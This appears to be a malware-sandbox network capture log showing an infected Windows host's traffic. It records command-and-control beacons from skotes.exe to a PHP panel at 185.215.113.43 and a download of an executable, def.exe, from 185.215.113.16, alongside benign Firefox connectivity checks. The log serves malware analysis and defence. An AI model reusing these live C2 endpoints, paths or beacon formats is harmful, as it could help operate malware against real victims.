Nov 22, 2024 20:37:01.105468035 CET	2472	OUT	Data Raw: d8 e5 91 91 29 34 00 df 21 46 62 7e 95 51 f9 e8 1f 47 d0 fb 57 49 3f 3c 12 98 d3 39 57 10 ec 4b af 26 be c4 7c 31 67 bc fa 73 e6 7d 4f 26 80 62 62 79 d0 1f ca f5 76 d1 1a 1c 11 20 52 5d b0 73 6d d2 cd 5d c5 75 dd 5d 8a a1 26 9d b4 9e 32 3b 91 09 Data Ascii: )4!Fb~QGWI?<9WK&\|1gs}O&bbyv R]sm]u]&2;xrbEiyRZ]"li#d~/a[Vl+AZbXEx+e$A@(S12[VZ@\|aqR09d>veJzJh&a%9
Nov 22, 2024 20:37:01.105503082 CET	2472	OUT	Data Raw: ec 1b b0 28 37 9c a0 31 96 58 e3 4b d7 5e ad ee c0 2f 10 ab f5 1d 1f 77 a2 2c a2 92 32 3b 95 fe ae 2a 5a 2e 1a 44 58 7d e1 16 ae 2a 67 da b3 8f 6d 1d 81 60 5b 84 f0 4c 33 2a 1f 1e cf 9e 21 a4 2e f5 99 1b 1c 14 9c 16 e7 53 71 25 45 33 79 91 9c 89 Data Ascii: (71XK^/w,2;Z.DX}gm`[L3*!.Sq%E3yH#m2m8[DeOcUHwqg=9m+Z 6Xq8JWM!l,1WbOH<8q/+B]cAVu
Nov 22, 2024 20:37:01.105593920 CET	2472	OUT	Data Raw: 85 fd e4 bd 37 6a ce 39 27 2a 3a 67 b4 a2 f4 ee ec c6 fd 4b 54 ff c7 a8 db b6 8c f6 86 a2 ba 63 1b 45 3d a4 12 5b ba 38 6a a4 55 d0 16 b8 da 91 db 6a 42 8e 99 4f d4 73 80 be 36 71 03 65 bc a3 b1 a8 ee 29 94 ae 0a bb e0 c3 f7 b4 df d9 68 92 30 78 Data Ascii: 7j9':gKTcE=[8jUjBOs6qe)h0x?x(dBz#00clH;{5?\+9k[9bQ-U{~Z/2:Eol"~1"NPH(`n\ofOO@W=Q
Nov 22, 2024 20:37:01.105699062 CET	805	OUT	Data Raw: 2b 4d 04 e5 ba bd 92 a3 7c 28 ce bd 5f 95 64 73 dc 1f d4 c0 2e 70 b7 03 a2 f2 27 03 d2 88 ff ae bb f1 1d 57 4e 7b d6 0b d1 50 d2 31 57 ec 4e c6 87 1d 14 79 5c 81 a3 55 b8 ca 0f da bb f8 5f f3 7c 19 1c 34 81 a8 a8 e0 13 eb 7a f2 49 6a db 1e 6c 67 Data Ascii: +M\|(_ds.p'WN{P1WNy\U_\|4zIjlg.qR~}e82?WV6(U"NzAr!hqGdOh)%Q&^kTOqle^RW~x;FM!_'?3t\|
Nov 22, 2024 20:37:02.642507076 CET	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Fri, 22 Nov 2024 19:37:02 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49948	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:02.545133114 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 22, 2024 20:37:03.980263948 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:37:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49962	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:05.892520905 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 22, 2024 20:37:07.369175911 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:37:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49974	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:08.159080029 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 22, 2024 20:37:09.347170115 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 22 Nov 2024 08:50:37 GMT Age: 38792 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 22, 2024 20:37:09.449990988 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 22, 2024 20:37:09.785645008 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 22 Nov 2024 08:50:37 GMT Age: 38792 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49982	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:09.114557981 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 22, 2024 20:37:10.451345921 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:37:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49984	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:09.630573988 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49988	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:09.909070015 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 22, 2024 20:37:11.088099003 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 22 Nov 2024 05:56:22 GMT Age: 49248 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 22, 2024 20:37:11.160377026 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 22, 2024 20:37:11.498505116 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 22 Nov 2024 05:56:22 GMT Age: 49249 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 22, 2024 20:37:11.583379030 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 22, 2024 20:37:11.915947914 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 22 Nov 2024 05:56:22 GMT Age: 49249 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 22, 2024 20:37:12.711560965 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 22, 2024 20:37:13.173494101 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 22 Nov 2024 05:56:22 GMT Age: 49250 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 22, 2024 20:37:14.212064028 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 22, 2024 20:37:14.545279026 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 22 Nov 2024 05:56:22 GMT Age: 49252 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 22, 2024 20:37:16.411508083 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 22, 2024 20:37:16.744540930 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 22 Nov 2024 05:56:22 GMT Age: 49254 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 22, 2024 20:37:26.799057007 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 22, 2024 20:37:37.001111031 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49989	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:10.017613888 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 22, 2024 20:37:11.151695013 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 22 Nov 2024 07:48:03 GMT Age: 42547 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 22, 2024 20:37:11.212028027 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 22, 2024 20:37:11.565568924 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 22 Nov 2024 07:48:03 GMT Age: 42548 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 22, 2024 20:37:12.192707062 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 22, 2024 20:37:12.676012039 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 22 Nov 2024 07:48:03 GMT Age: 42549 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 22, 2024 20:37:13.880481958 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 22, 2024 20:37:14.204793930 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 22 Nov 2024 07:48:03 GMT Age: 42551 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 22, 2024 20:37:16.083204031 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 22, 2024 20:37:16.407114029 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 22 Nov 2024 07:48:03 GMT Age: 42553 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 22, 2024 20:37:26.436301947 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 22, 2024 20:37:36.638412952 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	50001	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:12.205352068 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 22, 2024 20:37:13.775712013 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:37:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	50008	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:14.835463047 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 22, 2024 20:37:16.201129913 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:37:15 GMT Content-Type: application/octet-stream Content-Length: 2819584 Last-Modified: Fri, 22 Nov 2024 19:31:44 GMT Connection: keep-alive ETag: "6740dc20-2b0600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ +W+`Ui` @ @.rsrc`2@.idata 8@jajeyrhy*:@xqskffqo `+@.taggant@+"*@
Nov 22, 2024 20:37:16.201173067 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:16.201185942 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:16.201338053 CET	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:16.201354980 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:16.201366901 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:16.201378107 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:16.201390028 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:16.201421976 CET	1236	IN	Data Raw: 7a 19 9a ed b3 76 79 73 71 94 0f eb 63 87 b2 c2 a8 76 76 53 11 a3 e8 72 71 94 0f 5d 62 8b b2 72 a4 76 9c f1 81 47 33 fb 52 cb 93 8a 44 9c 14 11 63 8f fd 73 01 76 2c fb 4e 65 96 43 09 88 49 40 6c 31 90 f2 c3 a0 10 cb 83 ad 9a c8 a2 91 33 77 d2 73 Data Ascii: zvysqcvvSrq]brvG3RDcsv,NeCI@l13ws6Obo~6}1\|lNlp:vGzR 4v0\dwu.}iugTi'nl-?o"inN+
Nov 22, 2024 20:37:16.201451063 CET	1236	IN	Data Raw: 3a 89 7c 0e 5f 9b dd fb fa bb 9d 24 da bc 17 cf 0a c5 c7 04 f3 35 c2 3e b9 c4 9e e3 7b 53 cf 94 6a 69 84 83 6f e1 d9 9c 73 f7 5f 23 8d e8 b6 45 02 15 d1 b9 a9 18 b8 43 c2 74 25 2c 7c bd 25 a9 c0 6c 8b 39 7c 00 c6 7f 20 b7 a7 c0 99 f7 d0 f1 af 6c Data Ascii: :\|_$5>{Sjios_#ECt%,\|%l9\| lW+M[8I3"x0d@.$vnuUWz\1bEkZ`R&f3RDVtm\[[d+{VR,R_
Nov 22, 2024 20:37:16.322850943 CET	1236	IN	Data Raw: b2 fd a4 89 f4 9d 4a 21 b8 dd aa 0e a7 7d ef ef 92 2c 3d 55 a2 79 f5 0b b5 e6 ad 83 c0 bd b3 53 78 e4 dd fc d5 c1 62 b0 8b ca c1 18 a9 36 0f af b6 93 fa d2 cc d0 dc bb 89 b1 ce b8 fb 4e 23 1a 94 40 5a 91 d4 2a 58 0c f4 01 c5 d1 b3 d5 2e 07 ce c1 Data Ascii: J!},=UySxb6N#@Z*X..C]t3dAS1i1M7&(c;RPzDf[]\|M!n"R('vW(^<~<f6yx#t6QnEB

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	50012	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
